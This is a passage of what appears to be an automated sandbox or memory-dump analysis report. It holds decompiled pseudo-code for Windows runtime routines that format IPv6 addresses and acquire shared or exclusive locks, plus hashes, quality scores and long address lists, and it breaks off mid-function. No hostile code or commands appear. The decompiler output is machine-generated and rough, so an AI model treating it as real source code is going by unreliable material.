                                                                                                                                                    • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                                                                    • API String ID: 402402107-258546922
                                                                                                                                                    • Opcode ID: ea5729df122829a5e8794eeca1b69d3731786de75340a925a884ba8b3b814f86
                                                                                                                                                    • Instruction ID: eec668b6938623f9b9436ea9632081af0f4c1342fa2293b6c45c678ccf3bf1e6
                                                                                                                                                    • Opcode Fuzzy Hash: ea5729df122829a5e8794eeca1b69d3731786de75340a925a884ba8b3b814f86
                                                                                                                                                    • Instruction Fuzzy Hash: 9CF1E3B2D00219EFCF11EF99C981EEEBBB9FF48304F15446AE505A7211EB349A45DB60
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 38%
                                                                                                                                                    			E009613CB(intOrPtr* _a4, intOrPtr _a8) {
                                                                                                                                                    				char _v8;
                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                    				intOrPtr* _v16;
                                                                                                                                                    				intOrPtr _v20;
                                                                                                                                                    				char _v24;
                                                                                                                                                    				intOrPtr _t71;
                                                                                                                                                    				signed int _t78;
                                                                                                                                                    				signed int _t86;
                                                                                                                                                    				char _t90;
                                                                                                                                                    				signed int _t91;
                                                                                                                                                    				signed int _t96;
                                                                                                                                                    				intOrPtr _t108;
                                                                                                                                                    				signed int _t114;
                                                                                                                                                    				void* _t115;
                                                                                                                                                    				intOrPtr _t128;
                                                                                                                                                    				intOrPtr* _t129;
                                                                                                                                                    				void* _t130;
                                                                                                                                                    
                                                                                                                                                    				_t129 = _a4;
                                                                                                                                                    				_t128 = _a8;
                                                                                                                                                    				_t116 = 0;
                                                                                                                                                    				_t71 = _t128 + 0x5c;
                                                                                                                                                    				_v8 = 8;
                                                                                                                                                    				_v20 = _t71;
                                                                                                                                                    				if( *_t129 == 0) {
                                                                                                                                                    					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
                                                                                                                                                    						goto L5;
                                                                                                                                                    					} else {
                                                                                                                                                    						_t96 =  *(_t129 + 8) & 0x0000ffff;
                                                                                                                                                    						if(_t96 != 0) {
                                                                                                                                                    							L38:
                                                                                                                                                    							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
                                                                                                                                                    								goto L5;
                                                                                                                                                    							} else {
                                                                                                                                                    								_push( *(_t129 + 0xf) & 0x000000ff);
                                                                                                                                                    								_push( *(_t129 + 0xe) & 0x000000ff);
                                                                                                                                                    								_push( *(_t129 + 0xd) & 0x000000ff);
                                                                                                                                                    								_t86 = E00957707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
                                                                                                                                                    								L36:
                                                                                                                                                    								return _t128 + _t86 * 2;
                                                                                                                                                    							}
                                                                                                                                                    						}
                                                                                                                                                    						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
                                                                                                                                                    						if(_t114 == 0) {
                                                                                                                                                    							L33:
                                                                                                                                                    							_t115 = 0x922926;
                                                                                                                                                    							L35:
                                                                                                                                                    							_push( *(_t129 + 0xf) & 0x000000ff);
                                                                                                                                                    							_push( *(_t129 + 0xe) & 0x000000ff);
                                                                                                                                                    							_push( *(_t129 + 0xd) & 0x000000ff);
                                                                                                                                                    							_push( *(_t129 + 0xc) & 0x000000ff);
                                                                                                                                                    							_t86 = E00957707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
                                                                                                                                                    							goto L36;
                                                                                                                                                    						}
                                                                                                                                                    						if(_t114 != 0xffff) {
                                                                                                                                                    							_t116 = 0;
                                                                                                                                                    							goto L38;
                                                                                                                                                    						}
                                                                                                                                                    						if(_t114 != 0) {
                                                                                                                                                    							_t115 = 0x929cac;
                                                                                                                                                    							goto L35;
                                                                                                                                                    						}
                                                                                                                                                    						goto L33;
                                                                                                                                                    					}
                                                                                                                                                    				} else {
                                                                                                                                                    					L5:
                                                                                                                                                    					_a8 = _t116;
                                                                                                                                                    					_a4 = _t116;
                                                                                                                                                    					_v12 = _t116;
                                                                                                                                                    					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
                                                                                                                                                    						if( *(_t129 + 0xa) == 0xfe5e) {
                                                                                                                                                    							_v8 = 6;
                                                                                                                                                    						}
                                                                                                                                                    					}
                                                                                                                                                    					_t90 = _v8;
                                                                                                                                                    					if(_t90 <= _t116) {
                                                                                                                                                    						L11:
                                                                                                                                                    						if(_a8 - _a4 <= 1) {
                                                                                                                                                    							_a8 = _t116;
                                                                                                                                                    							_a4 = _t116;
                                                                                                                                                    						}
                                                                                                                                                    						_t91 = 0;
                                                                                                                                                    						if(_v8 <= _t116) {
                                                                                                                                                    							L22:
                                                                                                                                                    							if(_v8 < 8) {
                                                                                                                                                    								_push( *(_t129 + 0xf) & 0x000000ff);
                                                                                                                                                    								_push( *(_t129 + 0xe) & 0x000000ff);
                                                                                                                                                    								_push( *(_t129 + 0xd) & 0x000000ff);
                                                                                                                                                    								_t128 = _t128 + E00957707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
                                                                                                                                                    							}
                                                                                                                                                    							return _t128;
                                                                                                                                                    						} else {
                                                                                                                                                    							L14:
                                                                                                                                                    							if(_a4 > _t91 || _t91 >= _a8) {
                                                                                                                                                    								if(_t91 != _t116 && _t91 != _a8) {
                                                                                                                                                    									_push(":");
                                                                                                                                                    									_push(_t71 - _t128 >> 1);
                                                                                                                                                    									_push(_t128);
                                                                                                                                                    									_t128 = _t128 + E00957707() * 2;
                                                                                                                                                    									_t71 = _v20;
                                                                                                                                                    									_t130 = _t130 + 0xc;
                                                                                                                                                    								}
                                                                                                                                                    								_t78 = E00957707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
                                                                                                                                                    								_t130 = _t130 + 0x10;
                                                                                                                                                    							} else {
                                                                                                                                                    								_push(L"::");
                                                                                                                                                    								_push(_t71 - _t128 >> 1);
                                                                                                                                                    								_push(_t128);
                                                                                                                                                    								_t78 = E00957707();
                                                                                                                                                    								_t130 = _t130 + 0xc;
                                                                                                                                                    								_t91 = _a8 - 1;
                                                                                                                                                    							}
                                                                                                                                                    							_t91 = _t91 + 1;
                                                                                                                                                    							_t128 = _t128 + _t78 * 2;
                                                                                                                                                    							_t71 = _v20;
                                                                                                                                                    							if(_t91 >= _v8) {
                                                                                                                                                    								goto L22;
                                                                                                                                                    							}
                                                                                                                                                    							_t116 = 0;
                                                                                                                                                    							goto L14;
                                                                                                                                                    						}
                                                                                                                                                    					} else {
                                                                                                                                                    						_t108 = 1;
                                                                                                                                                    						_v16 = _t129;
                                                                                                                                                    						_v24 = _t90;
                                                                                                                                                    						do {
                                                                                                                                                    							if( *_v16 == _t116) {
                                                                                                                                                    								if(_t108 - _v12 > _a8 - _a4) {
                                                                                                                                                    									_a4 = _v12;
                                                                                                                                                    									_a8 = _t108;
                                                                                                                                                    								}
                                                                                                                                                    								_t116 = 0;
                                                                                                                                                    							} else {
                                                                                                                                                    								_v12 = _t108;
                                                                                                                                                    							}
                                                                                                                                                    							_v16 = _v16 + 2;
                                                                                                                                                    							_t108 = _t108 + 1;
                                                                                                                                                    							_t26 =  &_v24;
                                                                                                                                                    							 *_t26 = _v24 - 1;
                                                                                                                                                    						} while ( *_t26 != 0);
                                                                                                                                                    						goto L11;
                                                                                                                                                    					}
                                                                                                                                                    				}
                                                                                                                                                    			}




















                                                                                                                                                    0x0096141c
                                                                                                                                                    0x00961411

                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246637446.0000000000910000.00000040.00000001.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                    • Associated: 00000007.00000002.2246630642.0000000000900000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246724865.00000000009F0000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246731757.0000000000A00000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246739338.0000000000A04000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246746087.0000000000A07000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246752065.0000000000A10000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246784838.0000000000A70000.00000040.00000001.sdmp
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ___swprintf_l
                                                                                                                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                    • API String ID: 48624451-2108815105
                                                                                                                                                    • Opcode ID: 4972c33cf10492ea9ecc1496663867f614997e95921c70ef63e4757d90bf4df7
                                                                                                                                                    • Instruction ID: ae4870abe607ce0fe14dde98dbd033f57bc04b9360ac77b99d088b838ca420db
                                                                                                                                                    • Opcode Fuzzy Hash: 4972c33cf10492ea9ecc1496663867f614997e95921c70ef63e4757d90bf4df7
                                                                                                                                                    • Instruction Fuzzy Hash: 966157B1904655AACF34DF99C8908BEBBB9EFD4301B18C42EF4DA47680D775AA40DB60
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 50%
                                                                                                                                                    			E00960554(signed int _a4, char _a8) {
                                                                                                                                                    				void* __ebx;
                                                                                                                                                    				void* __edi;
                                                                                                                                                    				void* __esi;
                                                                                                                                                    				signed int* _t49;
                                                                                                                                                    				signed int _t51;
                                                                                                                                                    				signed int _t56;
                                                                                                                                                    				signed int _t58;
                                                                                                                                                    				signed int _t61;
                                                                                                                                                    				signed int _t63;
                                                                                                                                                    				void* _t66;
                                                                                                                                                    				intOrPtr _t67;
                                                                                                                                                    				void* _t69;
                                                                                                                                                    				signed int _t70;
                                                                                                                                                    				void* _t75;
                                                                                                                                                    				signed int _t81;
                                                                                                                                                    				signed int _t84;
                                                                                                                                                    				void* _t86;
                                                                                                                                                    				signed int _t93;
                                                                                                                                                    				signed int _t96;
                                                                                                                                                    				intOrPtr _t105;
                                                                                                                                                    				signed int _t107;
                                                                                                                                                    				void* _t110;
                                                                                                                                                    				signed int _t115;
                                                                                                                                                    				signed int* _t119;
                                                                                                                                                    				void* _t125;
                                                                                                                                                    				void* _t126;
                                                                                                                                                    				signed int _t128;
                                                                                                                                                    				signed int _t130;
                                                                                                                                                    				signed int _t138;
                                                                                                                                                    				signed int _t144;
                                                                                                                                                    				void* _t158;
                                                                                                                                                    				void* _t159;
                                                                                                                                                    				void* _t160;
                                                                                                                                                    
                                                                                                                                                    				_t96 = _a4;
                                                                                                                                                    				_t115 =  *(_t96 + 0x28);
                                                                                                                                                    				_push(_t138);
                                                                                                                                                    				if(_t115 < 0) {
                                                                                                                                                    					_t105 =  *[fs:0x18];
                                                                                                                                                    					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
                                                                                                                                                    					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
                                                                                                                                                    						goto L6;
                                                                                                                                                    					} else {
                                                                                                                                                    						__eflags = _t115 | 0xffffffff;
                                                                                                                                                    						asm("lock xadd [eax], edx");
                                                                                                                                                    						return 1;
                                                                                                                                                    					}
                                                                                                                                                    				} else {
                                                                                                                                                    					L6:
                                                                                                                                                    					_push(_t128);
                                                                                                                                                    					while(1) {
                                                                                                                                                    						L7:
                                                                                                                                                    						__eflags = _t115;
                                                                                                                                                    						if(_t115 >= 0) {
                                                                                                                                                    							break;
                                                                                                                                                    						}
                                                                                                                                                    						__eflags = _a8;
                                                                                                                                                    						if(_a8 == 0) {
                                                                                                                                                    							__eflags = 0;
                                                                                                                                                    							return 0;
                                                                                                                                                    						} else {
                                                                                                                                                    							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                                                                                                                                    							_t49 = _t96 + 0x1c;
                                                                                                                                                    							_t106 = 1;
                                                                                                                                                    							asm("lock xadd [edx], ecx");
                                                                                                                                                    							_t115 =  *(_t96 + 0x28);
                                                                                                                                                    							__eflags = _t115;
                                                                                                                                                    							if(_t115 < 0) {
                                                                                                                                                    								L23:
                                                                                                                                                    								_t130 = 0;
                                                                                                                                                    								__eflags = 0;
                                                                                                                                                    								while(1) {
                                                                                                                                                    									_t118 =  *(_t96 + 0x30) & 0x00000001;
                                                                                                                                                    									asm("sbb esi, esi");
                                                                                                                                                    									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x00a001c0;
                                                                                                                                                    									_push(_t144);
                                                                                                                                                    									_push(0);
                                                                                                                                                    									_t51 = E0091F8CC( *((intOrPtr*)(_t96 + 0x18)));
                                                                                                                                                    									__eflags = _t51 - 0x102;
                                                                                                                                                    									if(_t51 != 0x102) {
                                                                                                                                                    										break;
                                                                                                                                                    									}
                                                                                                                                                    									_t106 =  *(_t144 + 4);
                                                                                                                                                    									_t126 =  *_t144;
                                                                                                                                                    									_t86 = L00964FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
                                                                                                                                                    									_push(_t126);
                                                                                                                                                    									_push(_t86);
                                                                                                                                                    									L00973F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
                                                                                                                                                    									L00973F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                                                                                                                                    									_t130 = _t130 + 1;
                                                                                                                                                    									_t160 = _t158 + 0x28;
                                                                                                                                                    									__eflags = _t130 - 2;
                                                                                                                                                    									if(__eflags > 0) {
                                                                                                                                                    										E009A217A(_t106, __eflags, _t96);
                                                                                                                                                    									}
                                                                                                                                                    									_push("RTL: Re-Waiting\n");
                                                                                                                                                    									_push(0);
                                                                                                                                                    									_push(0x65);
                                                                                                                                                    									L00973F92();
                                                                                                                                                    									_t158 = _t160 + 0xc;
                                                                                                                                                    								}
                                                                                                                                                    								__eflags = _t51;
                                                                                                                                                    								if(__eflags < 0) {
                                                                                                                                                    									_push(_t51);
                                                                                                                                                    									L00963915(_t96, _t106, _t118, _t130, _t144, __eflags);
                                                                                                                                                    									asm("int3");
                                                                                                                                                    									while(1) {
                                                                                                                                                    										L32:
                                                                                                                                                    										__eflags = _a8;
                                                                                                                                                    										if(_a8 == 0) {
                                                                                                                                                    											break;
                                                                                                                                                    										}
                                                                                                                                                    										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                                                                                                                                    										_t119 = _t96 + 0x24;
                                                                                                                                                    										_t107 = 1;
                                                                                                                                                    										asm("lock xadd [eax], ecx");
                                                                                                                                                    										_t56 =  *(_t96 + 0x28);
                                                                                                                                                    										_a4 = _t56;
                                                                                                                                                    										__eflags = _t56;
                                                                                                                                                    										if(_t56 != 0) {
                                                                                                                                                    											L40:
                                                                                                                                                    											_t128 = 0;
                                                                                                                                                    											__eflags = 0;
                                                                                                                                                    											while(1) {
                                                                                                                                                    												_t121 =  *(_t96 + 0x30) & 0x00000001;
                                                                                                                                                    												asm("sbb esi, esi");
                                                                                                                                                    												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x00a001c0;
                                                                                                                                                    												_push(_t138);
                                                                                                                                                    												_push(0);
                                                                                                                                                    												_t58 = E0091F8CC( *((intOrPtr*)(_t96 + 0x20)));
                                                                                                                                                    												__eflags = _t58 - 0x102;
                                                                                                                                                    												if(_t58 != 0x102) {
                                                                                                                                                    													break;
                                                                                                                                                    												}
                                                                                                                                                    												_t107 =  *(_t138 + 4);
                                                                                                                                                    												_t125 =  *_t138;
                                                                                                                                                    												_t75 = L00964FC0(_t125, _t107, 0xff676980, 0xffffffff);
                                                                                                                                                    												_push(_t125);
                                                                                                                                                    												_push(_t75);
                                                                                                                                                    												L00973F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
                                                                                                                                                    												L00973F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                                                                                                                                    												_t128 = _t128 + 1;
                                                                                                                                                    												_t159 = _t158 + 0x28;
                                                                                                                                                    												__eflags = _t128 - 2;
                                                                                                                                                    												if(__eflags > 0) {
                                                                                                                                                    													E009A217A(_t107, __eflags, _t96);
                                                                                                                                                    												}
                                                                                                                                                    												_push("RTL: Re-Waiting\n");
                                                                                                                                                    												_push(0);
                                                                                                                                                    												_push(0x65);
                                                                                                                                                    												L00973F92();
                                                                                                                                                    												_t158 = _t159 + 0xc;
                                                                                                                                                    											}
                                                                                                                                                    											__eflags = _t58;
                                                                                                                                                    											if(__eflags < 0) {
                                                                                                                                                    												_push(_t58);
                                                                                                                                                    												L00963915(_t96, _t107, _t121, _t128, _t138, __eflags);
                                                                                                                                                    												asm("int3");
                                                                                                                                                    												_t61 =  *_t107;
                                                                                                                                                    												 *_t107 = 0;
                                                                                                                                                    												__eflags = _t61;
                                                                                                                                                    												if(_t61 == 0) {
                                                                                                                                                    													L1:
                                                                                                                                                    													_t63 = E00945384(_t138 + 0x24);
                                                                                                                                                    													if(_t63 != 0) {
                                                                                                                                                    														goto L52;
                                                                                                                                                    													} else {
                                                                                                                                                    														goto L2;
                                                                                                                                                    													}
                                                                                                                                                    												} else {
                                                                                                                                                    													_t123 =  *((intOrPtr*)(_t138 + 0x18));
                                                                                                                                                    													_push( &_a4);
                                                                                                                                                    													_push(_t61);
                                                                                                                                                    													_t70 = L0091F970( *((intOrPtr*)(_t138 + 0x18)));
                                                                                                                                                    													__eflags = _t70;
                                                                                                                                                    													if(__eflags >= 0) {
                                                                                                                                                    														goto L1;
                                                                                                                                                    													} else {
                                                                                                                                                    														_push(_t70);
                                                                                                                                                    														L00963915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
                                                                                                                                                    														L52:
                                                                                                                                                    														_t122 =  *((intOrPtr*)(_t138 + 0x20));
                                                                                                                                                    														_push( &_a4);
                                                                                                                                                    														_push(1);
                                                                                                                                                    														_t63 = L0091F970( *((intOrPtr*)(_t138 + 0x20)));
                                                                                                                                                    														__eflags = _t63;
                                                                                                                                                    														if(__eflags >= 0) {
                                                                                                                                                    															L2:
                                                                                                                                                    															return _t63;
                                                                                                                                                    														} else {
                                                                                                                                                    															_push(_t63);
                                                                                                                                                    															L00963915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
                                                                                                                                                    															_t109 =  *((intOrPtr*)(_t138 + 0x20));
                                                                                                                                                    															_push( &_a4);
                                                                                                                                                    															_push(1);
                                                                                                                                                    															_t63 = L0091F970( *((intOrPtr*)(_t138 + 0x20)));
                                                                                                                                                    															__eflags = _t63;
                                                                                                                                                    															if(__eflags >= 0) {
                                                                                                                                                    																goto L2;
                                                                                                                                                    															} else {
                                                                                                                                                    																_push(_t63);
                                                                                                                                                    																_t66 = L00963915(_t96, _t109, _t122, _t128, _t138, __eflags);
                                                                                                                                                    																asm("int3");
                                                                                                                                                    																while(1) {
                                                                                                                                                    																	_t110 = _t66;
                                                                                                                                                    																	__eflags = _t66 - 1;
                                                                                                                                                    																	if(_t66 != 1) {
                                                                                                                                                    																		break;
                                                                                                                                                    																	}
                                                                                                                                                    																	_t128 = _t128 | 0xffffffff;
                                                                                                                                                    																	_t66 = _t110;
                                                                                                                                                    																	asm("lock cmpxchg [ebx], edi");
                                                                                                                                                    																	__eflags = _t66 - _t110;
                                                                                                                                                    																	if(_t66 != _t110) {
                                                                                                                                                    																		continue;
                                                                                                                                                    																	} else {
                                                                                                                                                    																		_t67 =  *[fs:0x18];
                                                                                                                                                    																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
                                                                                                                                                    																		return _t67;
                                                                                                                                                    																	}
                                                                                                                                                    																	goto L59;
                                                                                                                                                    																}
                                                                                                                                                    																E00945329(_t110, _t138);
                                                                                                                                                    																_t69 = E009453A5(_t138, 1);
                                                                                                                                                    																return _t69;
                                                                                                                                                    															}
                                                                                                                                                    														}
                                                                                                                                                    													}
                                                                                                                                                    												}
                                                                                                                                                    											} else {
                                                                                                                                                    												_t56 =  *(_t96 + 0x28);
                                                                                                                                                    												goto L3;
                                                                                                                                                    											}
                                                                                                                                                    										} else {
                                                                                                                                                    											_t107 =  *_t119;
                                                                                                                                                    											__eflags = _t107;
                                                                                                                                                    											if(__eflags > 0) {
                                                                                                                                                    												while(1) {
                                                                                                                                                    													_t81 = _t107;
                                                                                                                                                    													asm("lock cmpxchg [edi], esi");
                                                                                                                                                    													__eflags = _t81 - _t107;
                                                                                                                                                    													if(_t81 == _t107) {
                                                                                                                                                    														break;
                                                                                                                                                    													}
                                                                                                                                                    													_t107 = _t81;
                                                                                                                                                    													__eflags = _t81;
                                                                                                                                                    													if(_t81 > 0) {
                                                                                                                                                    														continue;
                                                                                                                                                    													}
                                                                                                                                                    													break;
                                                                                                                                                    												}
                                                                                                                                                    												_t56 = _a4;
                                                                                                                                                    												__eflags = _t107;
                                                                                                                                                    											}
                                                                                                                                                    											if(__eflags != 0) {
                                                                                                                                                    												while(1) {
                                                                                                                                                    													L3:
                                                                                                                                                    													__eflags = _t56;
                                                                                                                                                    													if(_t56 != 0) {
                                                                                                                                                    														goto L32;
                                                                                                                                                    													}
                                                                                                                                                    													_t107 = _t107 | 0xffffffff;
                                                                                                                                                    													_t56 = 0;
                                                                                                                                                    													asm("lock cmpxchg [edx], ecx");
                                                                                                                                                    													__eflags = 0;
                                                                                                                                                    													if(0 != 0) {
                                                                                                                                                    														continue;
                                                                                                                                                    													} else {
                                                                                                                                                    														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                                                                                                                    														return 1;
                                                                                                                                                    													}
                                                                                                                                                    													goto L59;
                                                                                                                                                    												}
                                                                                                                                                    												continue;
                                                                                                                                                    											} else {
                                                                                                                                                    												goto L40;
                                                                                                                                                    											}
                                                                                                                                                    										}
                                                                                                                                                    										goto L59;
                                                                                                                                                    									}
                                                                                                                                                    									__eflags = 0;
                                                                                                                                                    									return 0;
                                                                                                                                                    								} else {
                                                                                                                                                    									_t115 =  *(_t96 + 0x28);
                                                                                                                                                    									continue;
                                                                                                                                                    								}
                                                                                                                                                    							} else {
                                                                                                                                                    								_t106 =  *_t49;
                                                                                                                                                    								__eflags = _t106;
                                                                                                                                                    								if(__eflags > 0) {
                                                                                                                                                    									while(1) {
                                                                                                                                                    										_t93 = _t106;
                                                                                                                                                    										asm("lock cmpxchg [edi], esi");
                                                                                                                                                    										__eflags = _t93 - _t106;
                                                                                                                                                    										if(_t93 == _t106) {
                                                                                                                                                    											break;
                                                                                                                                                    										}
                                                                                                                                                    										_t106 = _t93;
                                                                                                                                                    										__eflags = _t93;
                                                                                                                                                    										if(_t93 > 0) {
                                                                                                                                                    											continue;
                                                                                                                                                    										}
                                                                                                                                                    										break;
                                                                                                                                                    									}
                                                                                                                                                    									__eflags = _t106;
                                                                                                                                                    								}
                                                                                                                                                    								if(__eflags != 0) {
                                                                                                                                                    									continue;
                                                                                                                                                    								} else {
                                                                                                                                                    									goto L23;
                                                                                                                                                    								}
                                                                                                                                                    							}
                                                                                                                                                    						}
                                                                                                                                                    						goto L59;
                                                                                                                                                    					}
                                                                                                                                                    					_t84 = _t115;
                                                                                                                                                    					asm("lock cmpxchg [esi], ecx");
                                                                                                                                                    					__eflags = _t84 - _t115;
                                                                                                                                                    					if(_t84 != _t115) {
                                                                                                                                                    						_t115 = _t84;
                                                                                                                                                    						goto L7;
                                                                                                                                                    					} else {
                                                                                                                                                    						return 1;
                                                                                                                                                    					}
                                                                                                                                                    				}
                                                                                                                                                    				L59:
                                                                                                                                                    			}

                                                                                                                                                    0x009822af
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009822af
                                                                                                                                                    0x009822b1
                                                                                                                                                    0x009822b4
                                                                                                                                                    0x009822b4
                                                                                                                                                    0x009822b6
                                                                                                                                                    0x009453be
                                                                                                                                                    0x009453be
                                                                                                                                                    0x009453be
                                                                                                                                                    0x009453c0
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009453cb
                                                                                                                                                    0x009453ce
                                                                                                                                                    0x009453d0
                                                                                                                                                    0x009453d4
                                                                                                                                                    0x009453d6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009453d8
                                                                                                                                                    0x009453e3
                                                                                                                                                    0x009453ea
                                                                                                                                                    0x009453ea
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009453d6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009822b6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0098228f
                                                                                                                                                    0x00982349
                                                                                                                                                    0x0098234d
                                                                                                                                                    0x00982251
                                                                                                                                                    0x00982251
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00982251
                                                                                                                                                    0x009821a4
                                                                                                                                                    0x009821a4
                                                                                                                                                    0x009821a6
                                                                                                                                                    0x009821a8
                                                                                                                                                    0x009821ac
                                                                                                                                                    0x009821b6
                                                                                                                                                    0x009821b8
                                                                                                                                                    0x009821bc
                                                                                                                                                    0x009821be
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009821c0
                                                                                                                                                    0x009821c2
                                                                                                                                                    0x009821c4
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009821c4
                                                                                                                                                    0x009821c6
                                                                                                                                                    0x009821c6
                                                                                                                                                    0x009821c8
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009821c8
                                                                                                                                                    0x009821a2
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00982183
                                                                                                                                                    0x0096057b
                                                                                                                                                    0x0096057d
                                                                                                                                                    0x00960581
                                                                                                                                                    0x00960583
                                                                                                                                                    0x00982178
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00960589
                                                                                                                                                    0x0096058f
                                                                                                                                                    0x0096058f
                                                                                                                                                    0x00960583
                                                                                                                                                    0x00000000

APIs
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00982206

Strings

Memory Dump Source
• Source File: 00000007.00000002.2246637446.0000000000910000.00000040.00000001.sdmp, Offset: 00900000, based on PE: true
• Associated: 00000007.00000002.2246630642.0000000000900000.00000040.00000001.sdmp
• Associated: 00000007.00000002.2246724865.00000000009F0000.00000040.00000001.sdmp
• Associated: 00000007.00000002.2246731757.0000000000A00000.00000040.00000001.sdmp
• Associated: 00000007.00000002.2246739338.0000000000A04000.00000040.00000001.sdmp
• Associated: 00000007.00000002.2246746087.0000000000A07000.00000040.00000001.sdmp
• Associated: 00000007.00000002.2246752065.0000000000A10000.00000040.00000001.sdmp
• Associated: 00000007.00000002.2246784838.0000000000A70000.00000040.00000001.sdmp

Similarity
• API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
• String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
• API String ID: 885266447-4236105082
• Opcode ID: 59f08a282faa4c420f0fc9b4342fa4342a06c891dca7008669db12de88f9d778
• Instruction ID: e85e9dc92339a425259b72e858c77936d78bd0037adfea23ab8281069589f657
• Opcode Fuzzy Hash: 59f08a282faa4c420f0fc9b4342fa4342a06c891dca7008669db12de88f9d778
• Instruction Fuzzy Hash: 2F5138317042156FEB14DB18DCC2FA633ADABD4720F218269FC59DB385D975EC418B90

Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 64%
E009614C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
    signed int _v8;
    char _v10;
    char _v140;
    void* __ebx;
    void* __edi;
    void* __esi;
    signed int _t24;
    void* _t26;
    signed int _t29;
    signed int _t34;
    signed int _t40;
    intOrPtr _t45;
    void* _t51;
    intOrPtr* _t52;
    void* _t54;
    signed int _t57;
    void* _t58;

    _t51 = __edx;
    _t24 =  *0xa02088; // 0x7745a8fa
    _v8 = _t24 ^ _t57;
    _t45 = _a16;
    _t53 = _a4;
    _t52 = _a20;
    if(_a4 == 0 || _t52 == 0) {
        L10:
        _t26 = 0xc000000d;
    } else {
        if(_t45 == 0) {
            if( *_t52 == _t45) {
                goto L3;
            } else {
                goto L10;
            }
        } else {
            L3:
            _t28 =  &_v140;
            if(_a12 != 0) {
                _push("[");
                _push(0x41);
                _push( &_v140);
                _t29 = E00957707();
                _t58 = _t58 + 0xc;
                _t28 = _t57 + _t29 * 2 - 0x88;
            }
            _t54 = E009613CB(_t53, _t28);
            if(_a8 != 0) {
                _t34 = E00957707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
                _t58 = _t58 + 0x10;
                _t54 = _t54 + _t34 * 2;
            }
            if(_a12 != 0) {
                _t40 = E00957707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
